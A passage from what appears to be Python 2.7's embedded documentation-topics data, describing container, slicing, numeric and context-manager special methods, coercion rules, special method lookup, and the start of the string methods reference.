If\n' ' *key* is of an inappropriate type, "TypeError" may be ' 'raised; if of\n' ' a value outside the set of indexes for the sequence ' '(after any\n' ' special interpretation of negative values), "IndexError" ' 'should be\n' ' raised. For mapping types, if *key* is missing (not in ' 'the\n' ' container), "KeyError" should be raised.\n' '\n' ' Note: "for" loops expect that an "IndexError" will be ' 'raised for\n' ' illegal indexes to allow proper detection of the end of ' 'the\n' ' sequence.\n' '\n' 'object.__missing__(self, key)\n' '\n' ' Called by "dict"."__getitem__()" to implement "self[key]" ' 'for dict\n' ' subclasses when key is not in the dictionary.\n' '\n' 'object.__setitem__(self, key, value)\n' '\n' ' Called to implement assignment to "self[key]". Same note ' 'as for\n' ' "__getitem__()". This should only be implemented for ' 'mappings if\n' ' the objects support changes to the values for keys, or if ' 'new keys\n' ' can be added, or for sequences if elements can be ' 'replaced. The\n' ' same exceptions should be raised for improper *key* ' 'values as for\n' ' the "__getitem__()" method.\n' '\n' 'object.__delitem__(self, key)\n' '\n' ' Called to implement deletion of "self[key]". Same note ' 'as for\n' ' "__getitem__()". This should only be implemented for ' 'mappings if\n' ' the objects support removal of keys, or for sequences if ' 'elements\n' ' can be removed from the sequence. The same exceptions ' 'should be\n' ' raised for improper *key* values as for the ' '"__getitem__()" method.\n' '\n' 'object.__iter__(self)\n' '\n' ' This method is called when an iterator is required for a ' 'container.\n' ' This method should return a new iterator object that can ' 'iterate\n' ' over all the objects in the container. 
For mappings, it ' 'should\n' ' iterate over the keys of the container, and should also ' 'be made\n' ' available as the method "iterkeys()".\n' '\n' ' Iterator objects also need to implement this method; they ' 'are\n' ' required to return themselves. For more information on ' 'iterator\n' ' objects, see Iterator Types.\n' '\n' 'object.__reversed__(self)\n' '\n' ' Called (if present) by the "reversed()" built-in to ' 'implement\n' ' reverse iteration. It should return a new iterator ' 'object that\n' ' iterates over all the objects in the container in reverse ' 'order.\n' '\n' ' If the "__reversed__()" method is not provided, the ' '"reversed()"\n' ' built-in will fall back to using the sequence protocol ' '("__len__()"\n' ' and "__getitem__()"). Objects that support the sequence ' 'protocol\n' ' should only provide "__reversed__()" if they can provide ' 'an\n' ' implementation that is more efficient than the one ' 'provided by\n' ' "reversed()".\n' '\n' ' New in version 2.6.\n' '\n' 'The membership test operators ("in" and "not in") are ' 'normally\n' 'implemented as an iteration through a sequence. However, ' 'container\n' 'objects can supply the following special method with a more ' 'efficient\n' 'implementation, which also does not require the object be a ' 'sequence.\n' '\n' 'object.__contains__(self, item)\n' '\n' ' Called to implement membership test operators. Should ' 'return true\n' ' if *item* is in *self*, false otherwise. 
For mapping ' 'objects, this\n' ' should consider the keys of the mapping rather than the ' 'values or\n' ' the key-item pairs.\n' '\n' ' For objects that don\'t define "__contains__()", the ' 'membership test\n' ' first tries iteration via "__iter__()", then the old ' 'sequence\n' ' iteration protocol via "__getitem__()", see this section ' 'in the\n' ' language reference.\n' '\n' '\n' 'Additional methods for emulation of sequence types\n' '==================================================\n' '\n' 'The following optional methods can be defined to further ' 'emulate\n' 'sequence objects. Immutable sequences methods should at ' 'most only\n' 'define "__getslice__()"; mutable sequences might define all ' 'three\n' 'methods.\n' '\n' 'object.__getslice__(self, i, j)\n' '\n' ' Deprecated since version 2.0: Support slice objects as ' 'parameters\n' ' to the "__getitem__()" method. (However, built-in types ' 'in CPython\n' ' currently still implement "__getslice__()". Therefore, ' 'you have to\n' ' override it in derived classes when implementing ' 'slicing.)\n' '\n' ' Called to implement evaluation of "self[i:j]". The ' 'returned object\n' ' should be of the same type as *self*. Note that missing ' '*i* or *j*\n' ' in the slice expression are replaced by zero or ' '"sys.maxsize",\n' ' respectively. If negative indexes are used in the slice, ' 'the\n' ' length of the sequence is added to that index. If the ' 'instance does\n' ' not implement the "__len__()" method, an "AttributeError" ' 'is\n' ' raised. No guarantee is made that indexes adjusted this ' 'way are not\n' ' still negative. Indexes which are greater than the ' 'length of the\n' ' sequence are not modified. If no "__getslice__()" is ' 'found, a slice\n' ' object is created instead, and passed to "__getitem__()" ' 'instead.\n' '\n' 'object.__setslice__(self, i, j, sequence)\n' '\n' ' Called to implement assignment to "self[i:j]". 
Same notes ' 'for *i*\n' ' and *j* as for "__getslice__()".\n' '\n' ' This method is deprecated. If no "__setslice__()" is ' 'found, or for\n' ' extended slicing of the form "self[i:j:k]", a slice ' 'object is\n' ' created, and passed to "__setitem__()", instead of ' '"__setslice__()"\n' ' being called.\n' '\n' 'object.__delslice__(self, i, j)\n' '\n' ' Called to implement deletion of "self[i:j]". Same notes ' 'for *i* and\n' ' *j* as for "__getslice__()". This method is deprecated. ' 'If no\n' ' "__delslice__()" is found, or for extended slicing of the ' 'form\n' ' "self[i:j:k]", a slice object is created, and passed to\n' ' "__delitem__()", instead of "__delslice__()" being ' 'called.\n' '\n' 'Notice that these methods are only invoked when a single ' 'slice with a\n' 'single colon is used, and the slice method is available. ' 'For slice\n' 'operations involving extended slice notation, or in absence ' 'of the\n' 'slice methods, "__getitem__()", "__setitem__()" or ' '"__delitem__()" is\n' 'called with a slice object as argument.\n' '\n' 'The following example demonstrate how to make your program ' 'or module\n' 'compatible with earlier versions of Python (assuming that ' 'methods\n' '"__getitem__()", "__setitem__()" and "__delitem__()" support ' 'slice\n' 'objects as arguments):\n' '\n' ' class MyClass:\n' ' ...\n' ' def __getitem__(self, index):\n' ' ...\n' ' def __setitem__(self, index, value):\n' ' ...\n' ' def __delitem__(self, index):\n' ' ...\n' '\n' ' if sys.version_info < (2, 0):\n' " # They won't be defined if version is at least " '2.0 final\n' '\n' ' def __getslice__(self, i, j):\n' ' return self[max(0, i):max(0, j):]\n' ' def __setslice__(self, i, j, seq):\n' ' self[max(0, i):max(0, j):] = seq\n' ' def __delslice__(self, i, j):\n' ' del self[max(0, i):max(0, j):]\n' ' ...\n' '\n' 'Note the calls to "max()"; these are necessary because of ' 'the handling\n' 'of negative indices before the "__*slice__()" methods are ' 'called.\n' 'When negative indexes 
are used, the "__*item__()" methods ' 'receive them\n' 'as provided, but the "__*slice__()" methods get a "cooked" ' 'form of the\n' 'index values. For each negative index value, the length of ' 'the\n' 'sequence is added to the index before calling the method ' '(which may\n' 'still result in a negative index); this is the customary ' 'handling of\n' 'negative indexes by the built-in sequence types, and the ' '"__*item__()"\n' 'methods are expected to do this as well. However, since ' 'they should\n' 'already be doing that, negative indexes cannot be passed in; ' 'they must\n' 'be constrained to the bounds of the sequence before being ' 'passed to\n' 'the "__*item__()" methods. Calling "max(0, i)" conveniently ' 'returns\n' 'the proper value.\n' '\n' '\n' 'Emulating numeric types\n' '=======================\n' '\n' 'The following methods can be defined to emulate numeric ' 'objects.\n' 'Methods corresponding to operations that are not supported ' 'by the\n' 'particular kind of number implemented (e.g., bitwise ' 'operations for\n' 'non-integral numbers) should be left undefined.\n' '\n' 'object.__add__(self, other)\n' 'object.__sub__(self, other)\n' 'object.__mul__(self, other)\n' 'object.__floordiv__(self, other)\n' 'object.__mod__(self, other)\n' 'object.__divmod__(self, other)\n' 'object.__pow__(self, other[, modulo])\n' 'object.__lshift__(self, other)\n' 'object.__rshift__(self, other)\n' 'object.__and__(self, other)\n' 'object.__xor__(self, other)\n' 'object.__or__(self, other)\n' '\n' ' These methods are called to implement the binary ' 'arithmetic\n' ' operations ("+", "-", "*", "//", "%", "divmod()", ' '"pow()", "**",\n' ' "<<", ">>", "&", "^", "|"). For instance, to evaluate ' 'the\n' ' expression "x + y", where *x* is an instance of a class ' 'that has an\n' ' "__add__()" method, "x.__add__(y)" is called. 
The ' '"__divmod__()"\n' ' method should be the equivalent to using "__floordiv__()" ' 'and\n' ' "__mod__()"; it should not be related to "__truediv__()" ' '(described\n' ' below). Note that "__pow__()" should be defined to ' 'accept an\n' ' optional third argument if the ternary version of the ' 'built-in\n' ' "pow()" function is to be supported.\n' '\n' ' If one of those methods does not support the operation ' 'with the\n' ' supplied arguments, it should return "NotImplemented".\n' '\n' 'object.__div__(self, other)\n' 'object.__truediv__(self, other)\n' '\n' ' The division operator ("/") is implemented by these ' 'methods. The\n' ' "__truediv__()" method is used when "__future__.division" ' 'is in\n' ' effect, otherwise "__div__()" is used. If only one of ' 'these two\n' ' methods is defined, the object will not support division ' 'in the\n' ' alternate context; "TypeError" will be raised instead.\n' '\n' 'object.__radd__(self, other)\n' 'object.__rsub__(self, other)\n' 'object.__rmul__(self, other)\n' 'object.__rdiv__(self, other)\n' 'object.__rtruediv__(self, other)\n' 'object.__rfloordiv__(self, other)\n' 'object.__rmod__(self, other)\n' 'object.__rdivmod__(self, other)\n' 'object.__rpow__(self, other)\n' 'object.__rlshift__(self, other)\n' 'object.__rrshift__(self, other)\n' 'object.__rand__(self, other)\n' 'object.__rxor__(self, other)\n' 'object.__ror__(self, other)\n' '\n' ' These methods are called to implement the binary ' 'arithmetic\n' ' operations ("+", "-", "*", "/", "%", "divmod()", "pow()", ' '"**",\n' ' "<<", ">>", "&", "^", "|") with reflected (swapped) ' 'operands.\n' ' These functions are only called if the left operand does ' 'not\n' ' support the corresponding operation and the operands are ' 'of\n' ' different types. 
[2] For instance, to evaluate the ' 'expression "x -\n' ' y", where *y* is an instance of a class that has an ' '"__rsub__()"\n' ' method, "y.__rsub__(x)" is called if "x.__sub__(y)" ' 'returns\n' ' *NotImplemented*.\n' '\n' ' Note that ternary "pow()" will not try calling ' '"__rpow__()" (the\n' ' coercion rules would become too complicated).\n' '\n' " Note: If the right operand's type is a subclass of the " 'left\n' " operand's type and that subclass provides the reflected " 'method\n' ' for the operation, this method will be called before ' 'the left\n' " operand's non-reflected method. This behavior allows " 'subclasses\n' " to override their ancestors' operations.\n" '\n' 'object.__iadd__(self, other)\n' 'object.__isub__(self, other)\n' 'object.__imul__(self, other)\n' 'object.__idiv__(self, other)\n' 'object.__itruediv__(self, other)\n' 'object.__ifloordiv__(self, other)\n' 'object.__imod__(self, other)\n' 'object.__ipow__(self, other[, modulo])\n' 'object.__ilshift__(self, other)\n' 'object.__irshift__(self, other)\n' 'object.__iand__(self, other)\n' 'object.__ixor__(self, other)\n' 'object.__ior__(self, other)\n' '\n' ' These methods are called to implement the augmented ' 'arithmetic\n' ' assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", ' '"<<=",\n' ' ">>=", "&=", "^=", "|="). These methods should attempt ' 'to do the\n' ' operation in-place (modifying *self*) and return the ' 'result (which\n' ' could be, but does not have to be, *self*). If a ' 'specific method\n' ' is not defined, the augmented assignment falls back to ' 'the normal\n' ' methods. For instance, to execute the statement "x += ' 'y", where\n' ' *x* is an instance of a class that has an "__iadd__()" ' 'method,\n' ' "x.__iadd__(y)" is called. 
If *x* is an instance of a ' 'class that\n' ' does not define a "__iadd__()" method, "x.__add__(y)" ' 'and\n' ' "y.__radd__(x)" are considered, as with the evaluation of ' '"x + y".\n' '\n' 'object.__neg__(self)\n' 'object.__pos__(self)\n' 'object.__abs__(self)\n' 'object.__invert__(self)\n' '\n' ' Called to implement the unary arithmetic operations ("-", ' '"+",\n' ' "abs()" and "~").\n' '\n' 'object.__complex__(self)\n' 'object.__int__(self)\n' 'object.__long__(self)\n' 'object.__float__(self)\n' '\n' ' Called to implement the built-in functions "complex()", ' '"int()",\n' ' "long()", and "float()". Should return a value of the ' 'appropriate\n' ' type.\n' '\n' 'object.__oct__(self)\n' 'object.__hex__(self)\n' '\n' ' Called to implement the built-in functions "oct()" and ' '"hex()".\n' ' Should return a string value.\n' '\n' 'object.__index__(self)\n' '\n' ' Called to implement "operator.index()". Also called ' 'whenever\n' ' Python needs an integer object (such as in slicing). ' 'Must return\n' ' an integer (int or long).\n' '\n' ' New in version 2.5.\n' '\n' 'object.__coerce__(self, other)\n' '\n' ' Called to implement "mixed-mode" numeric arithmetic. ' 'Should either\n' ' return a 2-tuple containing *self* and *other* converted ' 'to a\n' ' common numeric type, or "None" if conversion is ' 'impossible. When\n' ' the common type would be the type of "other", it is ' 'sufficient to\n' ' return "None", since the interpreter will also ask the ' 'other object\n' ' to attempt a coercion (but sometimes, if the ' 'implementation of the\n' ' other type cannot be changed, it is useful to do the ' 'conversion to\n' ' the other type here). A return value of "NotImplemented" ' 'is\n' ' equivalent to returning "None".\n' '\n' '\n' 'Coercion rules\n' '==============\n' '\n' 'This section used to document the rules for coercion. 
As ' 'the language\n' 'has evolved, the coercion rules have become hard to ' 'document\n' 'precisely; documenting what one version of one particular\n' 'implementation does is undesirable. Instead, here are some ' 'informal\n' 'guidelines regarding coercion. In Python 3, coercion will ' 'not be\n' 'supported.\n' '\n' '* If the left operand of a % operator is a string or Unicode ' 'object,\n' ' no coercion takes place and the string formatting ' 'operation is\n' ' invoked instead.\n' '\n' '* It is no longer recommended to define a coercion ' 'operation. Mixed-\n' " mode operations on types that don't define coercion pass " 'the\n' ' original arguments to the operation.\n' '\n' '* New-style classes (those derived from "object") never ' 'invoke the\n' ' "__coerce__()" method in response to a binary operator; ' 'the only\n' ' time "__coerce__()" is invoked is when the built-in ' 'function\n' ' "coerce()" is called.\n' '\n' '* For most intents and purposes, an operator that returns\n' ' "NotImplemented" is treated the same as one that is not ' 'implemented\n' ' at all.\n' '\n' '* Below, "__op__()" and "__rop__()" are used to signify the ' 'generic\n' ' method names corresponding to an operator; "__iop__()" is ' 'used for\n' ' the corresponding in-place operator. For example, for the ' 'operator\n' ' \'"+"\', "__add__()" and "__radd__()" are used for the ' 'left and right\n' ' variant of the binary operator, and "__iadd__()" for the ' 'in-place\n' ' variant.\n' '\n' '* For objects *x* and *y*, first "x.__op__(y)" is tried. If ' 'this is\n' ' not implemented or returns "NotImplemented", ' '"y.__rop__(x)" is\n' ' tried. If this is also not implemented or returns ' '"NotImplemented",\n' ' a "TypeError" exception is raised. 
But see the following ' 'exception:\n' '\n' '* Exception to the previous item: if the left operand is an ' 'instance\n' ' of a built-in type or a new-style class, and the right ' 'operand is an\n' ' instance of a proper subclass of that type or class and ' 'overrides\n' ' the base\'s "__rop__()" method, the right operand\'s ' '"__rop__()"\n' ' method is tried *before* the left operand\'s "__op__()" ' 'method.\n' '\n' ' This is done so that a subclass can completely override ' 'binary\n' ' operators. Otherwise, the left operand\'s "__op__()" ' 'method would\n' ' always accept the right operand: when an instance of a ' 'given class\n' ' is expected, an instance of a subclass of that class is ' 'always\n' ' acceptable.\n' '\n' '* When either operand type defines a coercion, this coercion ' 'is\n' ' called before that type\'s "__op__()" or "__rop__()" ' 'method is\n' ' called, but no sooner. If the coercion returns an object ' 'of a\n' ' different type for the operand whose coercion is invoked, ' 'part of\n' ' the process is redone using the new object.\n' '\n' '* When an in-place operator (like \'"+="\') is used, if the ' 'left\n' ' operand implements "__iop__()", it is invoked without any ' 'coercion.\n' ' When the operation falls back to "__op__()" and/or ' '"__rop__()", the\n' ' normal coercion rules apply.\n' '\n' '* In "x + y", if *x* is a sequence that implements sequence\n' ' concatenation, sequence concatenation is invoked.\n' '\n' '* In "x * y", if one operand is a sequence that implements ' 'sequence\n' ' repetition, and the other is an integer ("int" or "long"), ' 'sequence\n' ' repetition is invoked.\n' '\n' '* Rich comparisons (implemented by methods "__eq__()" and so ' 'on)\n' ' never use coercion. 
Three-way comparison (implemented by\n' ' "__cmp__()") does use coercion under the same conditions ' 'as other\n' ' binary operations use it.\n' '\n' '* In the current implementation, the built-in numeric types ' '"int",\n' ' "long", "float", and "complex" do not use coercion. All ' 'these types\n' ' implement a "__coerce__()" method, for use by the ' 'built-in\n' ' "coerce()" function.\n' '\n' ' Changed in version 2.7: The complex type no longer makes ' 'implicit\n' ' calls to the "__coerce__()" method for mixed-type binary ' 'arithmetic\n' ' operations.\n' '\n' '\n' 'With Statement Context Managers\n' '===============================\n' '\n' 'New in version 2.5.\n' '\n' 'A *context manager* is an object that defines the runtime ' 'context to\n' 'be established when executing a "with" statement. The ' 'context manager\n' 'handles the entry into, and the exit from, the desired ' 'runtime context\n' 'for the execution of the block of code. Context managers ' 'are normally\n' 'invoked using the "with" statement (described in section The ' 'with\n' 'statement), but can also be used by directly invoking their ' 'methods.\n' '\n' 'Typical uses of context managers include saving and ' 'restoring various\n' 'kinds of global state, locking and unlocking resources, ' 'closing opened\n' 'files, etc.\n' '\n' 'For more information on context managers, see Context ' 'Manager Types.\n' '\n' 'object.__enter__(self)\n' '\n' ' Enter the runtime context related to this object. The ' '"with"\n' " statement will bind this method's return value to the " 'target(s)\n' ' specified in the "as" clause of the statement, if any.\n' '\n' 'object.__exit__(self, exc_type, exc_value, traceback)\n' '\n' ' Exit the runtime context related to this object. The ' 'parameters\n' ' describe the exception that caused the context to be ' 'exited. 
If the\n' ' context was exited without an exception, all three ' 'arguments will\n' ' be "None".\n' '\n' ' If an exception is supplied, and the method wishes to ' 'suppress the\n' ' exception (i.e., prevent it from being propagated), it ' 'should\n' ' return a true value. Otherwise, the exception will be ' 'processed\n' ' normally upon exit from this method.\n' '\n' ' Note that "__exit__()" methods should not reraise the ' 'passed-in\n' " exception; this is the caller's responsibility.\n" '\n' 'See also:\n' '\n' ' **PEP 343** - The "with" statement\n' ' The specification, background, and examples for the ' 'Python "with"\n' ' statement.\n' '\n' '\n' 'Special method lookup for old-style classes\n' '===========================================\n' '\n' 'For old-style classes, special methods are always looked up ' 'in exactly\n' 'the same way as any other method or attribute. This is the ' 'case\n' 'regardless of whether the method is being looked up ' 'explicitly as in\n' '"x.__getitem__(i)" or implicitly as in "x[i]".\n' '\n' 'This behaviour means that special methods may exhibit ' 'different\n' 'behaviour for different instances of a single old-style ' 'class if the\n' 'appropriate special attributes are set differently:\n' '\n' ' >>> class C:\n' ' ... pass\n' ' ...\n' ' >>> c1 = C()\n' ' >>> c2 = C()\n' ' >>> c1.__len__ = lambda: 5\n' ' >>> c2.__len__ = lambda: 9\n' ' >>> len(c1)\n' ' 5\n' ' >>> len(c2)\n' ' 9\n' '\n' '\n' 'Special method lookup for new-style classes\n' '===========================================\n' '\n' 'For new-style classes, implicit invocations of special ' 'methods are\n' "only guaranteed to work correctly if defined on an object's " 'type, not\n' "in the object's instance dictionary. That behaviour is the " 'reason why\n' 'the following code raises an exception (unlike the ' 'equivalent example\n' 'with old-style classes):\n' '\n' ' >>> class C(object):\n' ' ... 
pass\n' ' ...\n' ' >>> c = C()\n' ' >>> c.__len__ = lambda: 5\n' ' >>> len(c)\n' ' Traceback (most recent call last):\n' ' File "<stdin>", line 1, in <module>\n' " TypeError: object of type 'C' has no len()\n" '\n' 'The rationale behind this behaviour lies with a number of ' 'special\n' 'methods such as "__hash__()" and "__repr__()" that are ' 'implemented by\n' 'all objects, including type objects. If the implicit lookup ' 'of these\n' 'methods used the conventional lookup process, they would ' 'fail when\n' 'invoked on the type object itself:\n' '\n' ' >>> 1 .__hash__() == hash(1)\n' ' True\n' ' >>> int.__hash__() == hash(int)\n' ' Traceback (most recent call last):\n' ' File "<stdin>", line 1, in <module>\n' " TypeError: descriptor '__hash__' of 'int' object needs an " 'argument\n' '\n' 'Incorrectly attempting to invoke an unbound method of a ' 'class in this\n' "way is sometimes referred to as 'metaclass confusion', and " 'is avoided\n' 'by bypassing the instance when looking up special methods:\n' '\n' ' >>> type(1).__hash__(1) == hash(1)\n' ' True\n' ' >>> type(int).__hash__(int) == hash(int)\n' ' True\n' '\n' 'In addition to bypassing any instance attributes in the ' 'interest of\n' 'correctness, implicit special method lookup generally also ' 'bypasses\n' 'the "__getattribute__()" method even of the object\'s ' 'metaclass:\n' '\n' ' >>> class Meta(type):\n' ' ... def __getattribute__(*args):\n' ' ... print "Metaclass getattribute invoked"\n' ' ... return type.__getattribute__(*args)\n' ' ...\n' ' >>> class C(object):\n' ' ... __metaclass__ = Meta\n' ' ... def __len__(self):\n' ' ... return 10\n' ' ... def __getattribute__(*args):\n' ' ... print "Class getattribute invoked"\n' ' ... 
return object.__getattribute__(*args)\n' ' ...\n' ' >>> c = C()\n' ' >>> c.__len__() # Explicit lookup via ' 'instance\n' ' Class getattribute invoked\n' ' 10\n' ' >>> type(c).__len__(c) # Explicit lookup via ' 'type\n' ' Metaclass getattribute invoked\n' ' 10\n' ' >>> len(c) # Implicit lookup\n' ' 10\n' '\n' 'Bypassing the "__getattribute__()" machinery in this fashion ' 'provides\n' 'significant scope for speed optimisations within the ' 'interpreter, at\n' 'the cost of some flexibility in the handling of special ' 'methods (the\n' 'special method *must* be set on the class object itself in ' 'order to be\n' 'consistently invoked by the interpreter).\n' '\n' '-[ Footnotes ]-\n' '\n' "[1] It *is* possible in some cases to change an object's " 'type,\n' " under certain controlled conditions. It generally isn't " 'a good\n' ' idea though, since it can lead to some very strange ' 'behaviour if\n' ' it is handled incorrectly.\n' '\n' '[2] For operands of the same type, it is assumed that if the ' 'non-\n' ' reflected method (such as "__add__()") fails the ' 'operation is not\n' ' supported, which is why the reflected method is not ' 'called.\n', 'string-methods': '\n' 'String Methods\n' '**************\n' '\n' 'Below are listed the string methods which both 8-bit ' 'strings and\n' 'Unicode objects support. Some of them are also available ' 'on\n' '"bytearray" objects.\n' '\n' "In addition, Python's strings support the sequence type " 'methods\n' 'described in the Sequence Types --- str, unicode, list, ' 'tuple,\n' 'bytearray, buffer, xrange section. To output formatted ' 'strings use\n' 'template strings or the "%" operator described in the ' 'String\n' 'Formatting Operations section. 
Also, see the "re" module ' 'for string\n' 'functions based on regular expressions.\n' '\n' 'str.capitalize()\n' '\n' ' Return a copy of the string with its first character ' 'capitalized\n' ' and the rest lowercased.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.center(width[, fillchar])\n' '\n' ' Return centered in a string of length *width*. Padding ' 'is done\n' ' using the specified *fillchar* (default is a space).\n' '\n' ' Changed in version 2.4: Support for the *fillchar* ' 'argument.\n' '\n' 'str.count(sub[, start[, end]])\n' '\n' ' Return the number of non-overlapping occurrences of ' 'substring *sub*\n' ' in the range [*start*, *end*]. Optional arguments ' '*start* and\n' ' *end* are interpreted as in slice notation.\n' '\n' 'str.decode([encoding[, errors]])\n' '\n' ' Decodes the string using the codec registered for ' '*encoding*.\n' ' *encoding* defaults to the default string encoding. ' '*errors* may\n' ' be given to set a different error handling scheme. The ' 'default is\n' ' "\'strict\'", meaning that encoding errors raise ' '"UnicodeError".\n' ' Other possible values are "\'ignore\'", "\'replace\'" ' 'and any other\n' ' name registered via "codecs.register_error()", see ' 'section Codec\n' ' Base Classes.\n' '\n' ' New in version 2.2.\n' '\n' ' Changed in version 2.3: Support for other error ' 'handling schemes\n' ' added.\n' '\n' ' Changed in version 2.7: Support for keyword arguments ' 'added.\n' '\n' 'str.encode([encoding[, errors]])\n' '\n' ' Return an encoded version of the string. Default ' 'encoding is the\n' ' current default string encoding. *errors* may be given ' 'to set a\n' ' different error handling scheme. 
The default for ' '*errors* is\n' ' "\'strict\'", meaning that encoding errors raise a ' '"UnicodeError".\n' ' Other possible values are "\'ignore\'", "\'replace\'",\n' ' "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any ' 'other name\n' ' registered via "codecs.register_error()", see section ' 'Codec Base\n' ' Classes. For a list of possible encodings, see section ' 'Standard\n' ' Encodings.\n' '\n' ' New in version 2.0.\n' '\n' ' Changed in version 2.3: Support for ' '"\'xmlcharrefreplace\'" and\n' ' "\'backslashreplace\'" and other error handling schemes ' 'added.\n' '\n' ' Changed in version 2.7: Support for keyword arguments ' 'added.\n' '\n' 'str.endswith(suffix[, start[, end]])\n' '\n' ' Return "True" if the string ends with the specified ' '*suffix*,\n' ' otherwise return "False". *suffix* can also be a tuple ' 'of suffixes\n' ' to look for. With optional *start*, test beginning at ' 'that\n' ' position. With optional *end*, stop comparing at that ' 'position.\n' '\n' ' Changed in version 2.5: Accept tuples as *suffix*.\n' '\n' 'str.expandtabs([tabsize])\n' '\n' ' Return a copy of the string where all tab characters ' 'are replaced\n' ' by one or more spaces, depending on the current column ' 'and the\n' ' given tab size. Tab positions occur every *tabsize* ' 'characters\n' ' (default is 8, giving tab positions at columns 0, 8, 16 ' 'and so on).\n' ' To expand the string, the current column is set to zero ' 'and the\n' ' string is examined character by character. If the ' 'character is a\n' ' tab ("\\t"), one or more space characters are inserted ' 'in the result\n' ' until the current column is equal to the next tab ' 'position. (The\n' ' tab character itself is not copied.) If the character ' 'is a newline\n' ' ("\\n") or return ("\\r"), it is copied and the current ' 'column is\n' ' reset to zero. 
Any other character is copied unchanged ' 'and the\n' ' current column is incremented by one regardless of how ' 'the\n' ' character is represented when printed.\n' '\n' " >>> '01\\t012\\t0123\\t01234'.expandtabs()\n" " '01 012 0123 01234'\n" " >>> '01\\t012\\t0123\\t01234'.expandtabs(4)\n" " '01 012 0123 01234'\n" '\n' 'str.find(sub[, start[, end]])\n' '\n' ' Return the lowest index in the string where substring ' '*sub* is\n' ' found within the slice "s[start:end]". Optional ' 'arguments *start*\n' ' and *end* are interpreted as in slice notation. Return ' '"-1" if\n' ' *sub* is not found.\n' '\n' ' Note: The "find()" method should be used only if you ' 'need to know\n' ' the position of *sub*. To check if *sub* is a ' 'substring or not,\n' ' use the "in" operator:\n' '\n' " >>> 'Py' in 'Python'\n" ' True\n' '\n' 'str.format(*args, **kwargs)\n' '\n' ' Perform a string formatting operation. The string on ' 'which this\n' ' method is called can contain literal text or ' 'replacement fields\n' ' delimited by braces "{}". Each replacement field ' 'contains either\n' ' the numeric index of a positional argument, or the name ' 'of a\n' ' keyword argument. 
Returns a copy of the string where ' 'each\n' ' replacement field is replaced with the string value of ' 'the\n' ' corresponding argument.\n' '\n' ' >>> "The sum of 1 + 2 is {0}".format(1+2)\n' " 'The sum of 1 + 2 is 3'\n" '\n' ' See Format String Syntax for a description of the ' 'various\n' ' formatting options that can be specified in format ' 'strings.\n' '\n' ' This method of string formatting is the new standard in ' 'Python 3,\n' ' and should be preferred to the "%" formatting described ' 'in String\n' ' Formatting Operations in new code.\n' '\n' ' New in version 2.6.\n' '\n' 'str.index(sub[, start[, end]])\n' '\n' ' Like "find()", but raise "ValueError" when the ' 'substring is not\n' ' found.\n' '\n' 'str.isalnum()\n' '\n' ' Return true if all characters in the string are ' 'alphanumeric and\n' ' there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isalpha()\n' '\n' ' Return true if all characters in the string are ' 'alphabetic and\n' ' there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isdigit()\n' '\n' ' Return true if all characters in the string are digits ' 'and there is\n' ' at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.islower()\n' '\n' ' Return true if all cased characters [4] in the string ' 'are lowercase\n' ' and there is at least one cased character, false ' 'otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isspace()\n' '\n' ' Return true if there are only whitespace characters in ' 'the string\n' ' and there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.istitle()\n' '\n' ' Return true if the string is a titlecased string and ' 'there is at\n' ' least one character, for example uppercase characters ' 'may only\n' ' follow 
uncased characters and lowercase characters only ' 'cased ones.\n' ' Return false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isupper()\n' '\n' ' Return true if all cased characters [4] in the string ' 'are uppercase\n' ' and there is at least one cased character, false ' 'otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.join(iterable)\n' '\n' ' Return a string which is the concatenation of the ' 'strings in the\n' ' *iterable* *iterable*. The separator between elements ' 'is the\n' ' string providing this method.\n' '\n' 'str.ljust(width[, fillchar])\n' '\n' ' Return the string left justified in a string of length ' '*width*.\n' ' Padding is done using the specified *fillchar* (default ' 'is a\n' ' space). The original string is returned if *width* is ' 'less than or\n' ' equal to "len(s)".\n' '\n' ' Changed in version 2.4: Support for the *fillchar* ' 'argument.\n' '\n' 'str.lower()\n' '\n' ' Return a copy of the string with all the cased ' 'characters [4]\n' ' converted to lowercase.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.lstrip([chars])\n' '\n' ' Return a copy of the string with leading characters ' 'removed. The\n' ' *chars* argument is a string specifying the set of ' 'characters to be\n' ' removed. If omitted or "None", the *chars* argument ' 'defaults to\n' ' removing whitespace. The *chars* argument is not a ' 'prefix; rather,\n' ' all combinations of its values are stripped:\n' '\n' " >>> ' spacious '.lstrip()\n" " 'spacious '\n" " >>> 'www.example.com'.lstrip('cmowz.')\n" " 'example.com'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* ' 'argument.\n' '\n' 'str.partition(sep)\n' '\n' ' Split the string at the first occurrence of *sep*, and ' 'return a\n' ' 3-tuple containing the part before the separator, the ' 'separator\n' ' itself, and the part after the separator. 
If the ' 'separator is not\n' ' found, return a 3-tuple containing the string itself, ' 'followed by\n' ' two empty strings.\n' '\n' ' New in version 2.5.\n' '\n' 'str.replace(old, new[, count])\n' '\n' ' Return a copy of the string with all occurrences of ' 'substring *old*\n' ' replaced by *new*. If the optional argument *count* is ' 'given, only\n' ' the first *count* occurrences are replaced.\n' '\n' 'str.rfind(sub[, start[, end]])\n' '\n' ' Return the highest index in the string where substring ' '*sub* is\n' ' found, such that *sub* is contained within ' '"s[start:end]".\n' ' Optional arguments *start* and *end* are interpreted as ' 'in slice\n' ' notation. Return "-1" on failure.\n' '\n' 'str.rindex(sub[, start[, end]])\n' '\n' ' Like "rfind()" but raises "ValueError" when the ' 'substring *sub* is\n' ' not found.\n' '\n' 'str.rjust(width[, fillchar])\n' '\n' ' Return the string right justified in a string of length ' '*width*.\n' ' Padding is done using the specified *fillchar* (default ' 'is a\n' ' space). The original string is returned if *width* is ' 'less than or\n' ' equal to "len(s)".\n' '\n' ' Changed in version 2.4: Support for the *fillchar* ' 'argument.\n' '\n' 'str.rpartition(sep)\n' '\n' 